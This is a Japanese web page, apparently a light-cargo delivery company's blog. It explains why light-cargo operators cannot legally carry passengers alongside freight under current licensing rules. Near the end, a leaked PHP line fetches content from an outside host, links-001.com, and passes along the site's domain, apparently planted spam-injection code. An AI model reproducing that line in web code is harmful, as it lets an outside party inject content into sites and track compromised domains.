前へ
次へ

軽貨物の運送が医療機関に貢献している?

軽貨物の運送は様々な業種にて活躍していますが、その中でも意外な業種の1つかもしれないのが医療機関です

more

軽貨物の運送の求人で女性が求められる理由

近年軽貨物の運送の求人で女性歓迎などの内容を見かけることが増えています。なぜここまで女性のドライバー

more

軽貨物の運送業者として働く場合は体力が必要か

トラックなどのドライバーと比較すると、軽貨物の運送業者は大きな荷物が少ないといった点などもあり、女性

more

貨客混載を軽貨物の運送業者が行うことは可能か

地方の過疎地域では高齢化による人口減少や宅配の需要の増加が今後増加していくことを見越して貨客混載という取り組みが始まっています。貨客混載では人と荷物を同じ車両にて同時に輸送を行う方法です。地方ではバス路線の赤字などによる公共交通機関の維持が困難になっていることや軽貨物による荷物の運送ではコスト面が難しいといった面から貨客混載が利用されています。人と物の輸送が同時にできるため公共交通機関の維持するコストが捻出しやすくなる点や燃料などを節約して運ぶことが可能なため環境にも貢献できることから利用する自治体も増加しています。こういった制度の担い手の一員として軽貨物の運送業者が貨客混載を行うことは可能なのでしょうか。現在の法律では貨客混載を行える事業者として軽貨物の運送業者は記載されていません。なぜなら軽貨物の運送と人を送迎する際の営業許可が異なるためです。軽貨物による運送の仕事をしたい場合は貨物軽自動車運送事業経営届出書が必要となります。一方で人の送迎を行いたい場合は旅客運送事業許可が必要となってきます。そういった面を考えると軽貨物の運送を行うドライバーが人も同時に運ぶということは法律的には困難といえるでしょう。また貨物軽自動車運送事業経営届出書は簡単に申請が可能で、許可が不要なのに対してこういった旅客運送事業許可は運行管理者の設置や車両の確保・資金面での基準といった様々な基準を満たさないと事業を行う許可が出ません。軽貨物の運送業者は1台から稼働ができるため簡単に始められますが、旅客運送事業を行うには複数台の車両を確保する必要があります。ですから単独で荷物を運ぶ軽貨物のドライバーの場合は仕事内容や営業許可を取得する制度の面からもマッチングしにくいサービスと言えるでしょう。しかし、今後法律の改正や社会状況の変化などがあれば、軽貨物の運送業者が貨客混載の担い手となる可能性もあります。今後もしかしたら軽貨物の運送業者が人と荷物を両方運ぶといった時代が来るかもしれません。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top